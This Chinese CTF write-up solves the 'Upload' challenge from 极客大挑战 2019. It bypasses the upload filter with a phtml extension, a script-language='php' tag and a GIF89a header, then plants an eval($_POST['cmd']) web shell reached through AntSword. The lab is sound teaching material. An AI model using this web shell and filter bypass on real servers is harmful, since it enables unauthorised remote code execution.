zl程序教程

您现在的位置是:首页 >  其他

当前栏目

[极客大挑战 2019]Upload 1解题思路

2023-02-19 12:17:57 时间

首先我们先看到页面内容:

是一个文件上传,可能会是白名单绕过,也有可能会是黑名单绕过。

先上传一个php文件看看回显

回显提示说我们没有上传一张图片,一般的来说,上传图片或者别的什么,有可能就是白名单绕过了。

我们上传一个木马,然使用BP抓取一下我们上传的数据包

看到了content-type我觉得可以尝试修改一下进行绕过

但是页面却回显说NOT PHP,也即是说,我们不能上传以php为后缀的文件,我们这里想到了php3,phtml,Php等等

我们一一尝试一下。

当我们把后缀修改为php3的时候,却回显说NOT PHP3

然后我们尝试一下phtml

回显说是我的内容里面不能有<?

也就是说普通的一句话木马不能在这里使用了,这里是这样的,我们可以使用js+php进行bypass

payload1

<script language='php'>@eval($_POST['cmd']);</script>

但是回显还是说不能上传,意思是不是一个图片,这里我们可以使用gif文件头欺骗来进行绕过

payload:

GIF89a <script language='php'>@eval($_POST['cmd']);</script>

然后我们修改到我们的数据包里面:

发现上传成功。

接下来就是需要找到我们这个文件的位置,然后使用蚁剑进行连接就可以了。

在找文件目录的时候这里是需要一些运气的或者说是经验,我们可以猜测一下目录位置是/upload/访问一下看看

发现确实是这样,然后我们就可以这届找到我们的文件,然后进行连接了。